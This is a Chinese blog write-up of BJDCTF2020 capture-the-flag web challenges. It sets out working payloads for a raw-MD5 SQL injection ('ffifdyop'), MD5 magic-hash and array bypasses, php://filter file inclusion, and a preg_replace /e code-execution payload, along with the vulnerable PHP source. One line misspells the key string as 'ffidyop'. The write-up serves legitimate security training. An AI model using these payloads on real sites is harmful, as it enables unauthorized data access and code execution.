[原题复现]BJDCTF2020 WEB部分全部解

最新推荐文章于 2024-07-09 15:48:24 发布
最新推荐文章于 2024-07-09 15:48:24 发布
阅读量1.3k 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43818995/article/details/105213799
版权

 简介

 原题复现:https://gitee.com/xiaohua1998/BJDCTF2020_January

 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题

1.Easy MD5

 1.涉及知识点:md5函数特性绕过、SQL注入

 md5() 

 md5() 函数计算字符串的 MD5 散列。

 md5() 函数使用 RSA 数据安全,包括 MD5 报文摘要算法。

md5(string,raw)
string必需。规定要计算的字符串。
raw

可选。规定十六进制或二进制输出格式:

  • TRUE - 原始 16 字符二进制格式
  • FALSE - 默认。32 字符十六进制数

 

2.通过md5($pass,true)实现SQL注入 

bp抓包  发包发现这一句

Hint: select * from 'admin' where password=md5($pass,true)

 

 可以看到这里的raw参数是True,意为返回原始16字符二进制格式。

 也就是说如果md5值经过hex转成字符串后为 'or'+balabala这样的字符串,则拼接后构成的SQL语句为:

select * from `admin` where password=''or'balabala'

 

 当'or'后面的值为True时,即可构成万能密码实现SQL注入,这里我们需要知道的是MySQL的一个特性:

所以只要'or'后面的字符串为一个非零的数字开头都会返回True,这就是我们的突破点。

 

可以通过这个脚本来获得满足我们要求的明文:

<?php 
for ($i = 0;;) { 
 for ($c = 0; $c < 1000000; $c++, $i++)
  if (stripos(md5($i, true), '\'or\'') !== false)
   echo "\nmd5($i) = " . md5($i, true) . "\n";
 echo ".";
}
?>

//引用于 http://mslc.ctf.su/wp/leet-more-2010-oh-those-admins-writeup/

 

这里提供一个最常用的:ffifdyop,该字符串md5加密后若raw参数为True时会返回 'or'6<trash> (<trash>其实就是一些乱码和不可见字符,这里只要第一位是非零数字即可被判定为True,后面的<trash>会在MySQL将其转换成整型比较时丢掉)

所以如果这里我们输入ffifdyop,后端的SQL语句会变成:

select * from `admin` where password=''or'6<trash>'           --->  True

 

引用大佬博客:https://www.cnblogs.com/yesec/p/12535534.html

所以输入ffidyop会到下一个页面。

 

3.通过Hash缺陷绕过md5()验证

hash缺陷参考https://www.cnblogs.com/xhds/p/12349189.html

通过查看源代码发现源码

payload:

http://96c67b57-df3d-41a2-bc76-836c71cda19b.node3.buuoj.cn/levels91.php?a=s878926199a&b=QNKCDZO

4.通过数组绕过

到下一个页面直接暴露出源码进行绕过

 payload:

POST:param1[]=1&param2[]=2

 

CTF数组绕过姿势

>     md5(array()) = null
>     sha1(array()) = null    
>     ereg(pattern,array()) = null vs preg_match(pattern,array) = false
>     strcmp(array(), "abc") = null
>     strpos(array(),"abc") = null

引用:https://blog.csdn.net/q1352483315/java/article/details/89469928

 

 

 

 2.ZJCTF,不过如此

 1.涉及知识点:文件包含、preg_replace()使用的/e模式可以存在远程执行代码

    reg_replace()使用的/e模式可以存在远程执行代码

    https://xz.aliyun.com/t/2557

2.本地文件包含漏洞利用

打开页面出现源码 审计构造..... 

第一个部分可以利用本地文件包含绕过

首先I have a dream base64编码 SSBoYXZlIGEgZHJlYW0= 使用PHP伪协议来绕过 file_get_contents==="I have a dream"  页面有个注释内容为next.PHP

最后构造payload:

?text=data://text/plain;base64,SSBoYXZlIGEgZHJlYW0=&file=php://filter/read=convert.base64-encode/resource=next.php

获得next.php文件的源码

 

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
    @eval($_GET['cmd']);
}

 3.利用.reg_replace()使用的/e模式远程执行代码getflag

payload:

/next.php?\S*=${getflag()}&cmd=show_source(%22/flag%22);

 简介

1

 简介

1

 简介

1

笑花大王
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BJDCTF2020--web-复现
ChenZIDu的博客
02-21 2739
BJDCTF2020 未完待续 Buu ZJCTF,就这? 看到这题名字还是很不爽的,毕竟我也是个浙江人,不过zjctf,有一说一确实。 BUU上和源题好像有点差别。 进题放出源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_g...
buuctf-[BJDCTF2020]ZJCTF,不过如此
qq_42728977的博客
12-26 2282
[BJDCTF2020]ZJCTF,不过如此考点复现参考 考点 preg_replace /e 参数执行漏洞、php伪协议、转义绕过 复现 点开链接 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1&g
[BJDCTF2020]rsa_output
m0_74030040的博客
04-09 527
版权声明:本文为CSDN博主「JustGo12」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。我们首先审计题目,可以发现题目中给了我们两个c和不同的{n,e}值,所以我们可以推断本题为共模攻击题目。原文链接:https://blog.csdn.net/shshss64/article/details/127182144。两者相乘,通过扩展欧几里得定理,我们可知e1与e2互质,必存在s1和s2使e1*s1+e2*s2=1。由此可求出相对应的s1和s2.
[BJDCTF2020]ZJCTF,不过如此1
m0_73673698的博客
06-17 1015
简单分析一下这段代码,代码通过GET方法来传入text和file两个参数,并且传入的text参数通过file_get_contents函数以只读的方式打开,而且当它强等于"I have a dream"这个字符串是,才能够去输出并且去执行下面的那个if判断。也就是这段代码会遍历传入的GET参数,将GET传入的变量名给了$re,把变量名的值给了$str,那么这样在传入paylaod的时候preg_replace会变成。我们将返回的base64码就是next.php的源码了,源码如下。
[BJDCTF2020] web题-Mark loves cat
BROTHERYY的博客
07-30 250
复现环境:buuoj.cn ./git下有两个php文件 flag.php index.php 审计下代码,发现是$$导致变量覆盖漏洞 http://5da85007-ec56-448d-b979-80f53cecc20f.node3.buuoj.cn/index.html?yds=flag flag{895a8277-0a85-4fdf-8252-e1ab74b8750f}
[BJDCTF2020] web题-Easy MD5
BROTHERYY的博客
07-09 277
复现环境:buuoj.cn 打开环境得到了提示 百度看了md5($pass,true) 总结: ffifdyop 这个字符串其哈希值:276f722736c95d99e921722cf9ed621c 字符串: ‘or’6 select * from admin where password=’’or’6‘ 相当于万能密码,条件永真。 进入以后查看源代码 数组绕过。原理是md5等函数不能处理数组,导致函数返回Null。而Null是等于Null的,导致了绕过,传入参数a[]=1&b[]=2,进入下
[BJDCTF2020]EzPHP
m0_62422842的博客
11-26 1156
这个题目考的php知识真的比较多,也比较经典。由于我php基础不是很好,总会遇到一些问题。花时间弄懂这道题后也能更加巩固所学的知识。所以这道题还是有必要记录下来的。
CTF-misc-(BJDCTF2020)纳尼
憨憨的博客
05-12 725
纳尼 附件下载下来是这样的一个文件 直接改名字改成1.rar,然后压有以下文件 然后打开题目.txt 盲猜肯定是文件头或者文件尾出错或者丢失 用010打开6.gif 果然就是文件头缺失 gif的文件头为 47 49 46 38 文件尾为 00 3B 这里只需要把文件头加上就行了,这里我遇到了一个问题就是加文件头时会替换掉后面的字节,我百度了一下看到人家都是直接写就行,我也不知道为什么,我换了winhex和winshark也是这样,最后我用010添加
[BJDCTF2020]EasySearch1
alwtj的博客
07-09 905
如果在编辑过程中Vim进程被意外终止或者用户没有正确地退出Vim,那么这个临时文件可能会被留下来,如果攻击者能够访问这个临时文件就可以获得原始文件的敏感信息,从而导致信息泄露,需要注意的是不同的操作失败次数将会导致产生不同后缀的交互文件,例如:index.php第一次产生的交换文件名为.index.php.swp,再次意外退出后将会产生名为.index.php.swo的交换文件,第三次产生的交换文件则为.index.php.swn。大多数服务器配置中,发现了我们写入的shtml文件的位置,去访问一下.
lscat cnindex php,BJDCTF2020--web-复现
weixin_35523284的博客
03-17 334
BJDCTF2020未完待续BuuZJCTF,就这?看到这题名字还是很不爽的,毕竟我也是个浙江人,不过zjctf,有一说一确实。BUU上和源题好像有点差别。进题放出源码:".file_get_contents($text,'r')."";if(preg_match("/flag/",$file)){die("Not now!");}include($file); //next.php}else{...
24年云曦考核web复现部分
03-18
24年云曦考核web复现部分
XYCTF部分web题目复现
05-06
### XYCTF部分web题目复现 #### 一、PHP Web ezClass 题目析 ##### 题目背景及分析 此题的核心在于理并利用PHP中的原生类特性,通过构造特定的请求来执行系统命令或获取敏感信息。 - **题目代码**: ```php ...
web安全程序设计大作业漏洞复现及修复
07-05
web安全程序设计大作业漏洞复现及修复,本实验采用xss漏洞利用靶场进行复现和修复,并且找到一个网站成功攻击了xss。本次报告打分85。
96原版_96年mpc论文代码复现_
10-04
在IT领域,特别是计算机科学与工程中,代码复现是一项重要的技能,它涉及到对已有算法或研究的重新实现,以验证其正确性、理和优化。本项目“96原版_96年mpc论文代码复现”显然是针对1996年的一篇关于模型预测控制...
毕设酒店管理系统论文视频源码集.zip
07-27
[毕设]酒店管理系统论文视频源码集" 是一个针对计算机科学或信息技术相关专业学生毕业设计项目的综合资源包。这个资源集包含了酒店管理系统开发所需的各个方面,旨在帮助学生从理论到实践全面理和掌握酒店管理系统的开发流程和技术细节。 具体来说,这个资源集通常包括: 论文:详细阐述了酒店管理系统的背景、需求分析、系统设计、实现过程及测试验证等各个环节,为学生提供了系统的理论框架和思路指导。 视频教程:通过视频形式,直观地展示了酒店管理系统的开发过程,包括开发环境的搭建、代码编写、数据库设计、功能实现等步骤,便于学生理和模仿。 源码:提供了酒店管理系统的完整源代码,包括前端界面、后端逻辑及数据库设计等部分,学生可以直接下载并运行,或者根据自己的需求进行修改和扩展。 综上所述,"毕设酒店管理系统论文视频源码集"是一个集论文指导、视频教学和源码实践于一体的综合性资源,对于想要进行酒店管理系统开发的学生来说,具有极高的参考价值和实用性。 参考4条信息源
Qt6.7.2+cmake构建eCAL+protobuf的Demo
最新发布
07-27
Qt6.7.2+cmake构建eCAL+protobuf的Demo。 1.send Demo 2.rec Demo
pillow-10.4.0-cp313-cp313-macosx_11_0_arm64.whl
07-27
基本介绍 名称与起源:Pillow,原名为PIL(Python Imaging Library),但PIL只支持Python 2版本。随着Python 3的普及,Pillow作为PIL的一个分支出现,兼容Python 3并提供更多的功能和改进。 主要功能:Pillow支持多种图像格式的打开、保存、显示以及基本的图像操作和处理,如裁剪、缩放、旋转、翻转、滤镜应用等。 跨平台性:Pillow库可以在不同的操作系统上运行,包括Windows、Linux和MacOS等。 主要功能模块 Pillow库包含多个功能模块,每个模块都提供了特定的图像处理功能。以下是一些常用的模块: Image:用于处理图像文件,提供打开、保存、调整大小、旋转、裁剪、滤镜等功能。 ImageDraw:提供在图像上绘制各种形状(如线条、矩形、圆形)和文本的功能。 ImageFont:用于加载和使用TrueType字体文件,以便在图像上绘制文本时设置字体样式、大小和颜色。 ImageFilter:提供各种滤镜效果,如模糊、锐化、边缘增强等,用于图像增强、特效处理和图像识别等应用。 ImageEnhance:用于调整图像的亮度、对比度、颜色饱和度等参数,使图像更加清晰、明亮或具有特定的调色效果。 高级功能 除了基本的图像处理功能外,Pillow还支持一些高级功能,如色彩空间转换、直方图均衡化等。这些功能可以帮助用户进行更复杂的图像处理和分析。
yolov5复现ccpd2020
05-05
首先,你需要下载CCPD2020数据集,并将其分为训练集、验证集和测试集。然后,你需要下载YOLOv5代码,或者通过GitHub克隆开源代码。 接着,你需要修改YOLOv5代码中的配置文件,以适应CCPD2020数据集的特征。具体来说,你需要修改数据集的路径、类别数和锚框尺寸等参数。你还需要选择一个适当的预训练模型,例如YOLOv5s、YOLOv5m、YOLOv5l或YOLOv5x,并将其与CCPD2020数据集进行微调。在训练模型之前,你可以使用数据增强技术来扩充数据集,以提高模型的泛化能力。 在训练过程中,你可以使用TensorBoard来可视化训练过程中的损失和指标。同时,你还可以使用EarlyStopping技术来避免过拟合,并使用学习率调整策略来优化模型的收敛速度。 最后,在测试阶段,你可以使用训练好的模型来检测CCPD2020数据集中的车牌。你可以使用mAP(平均精度)指标来评估模型的性能,并根据结果进行调整和优化。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值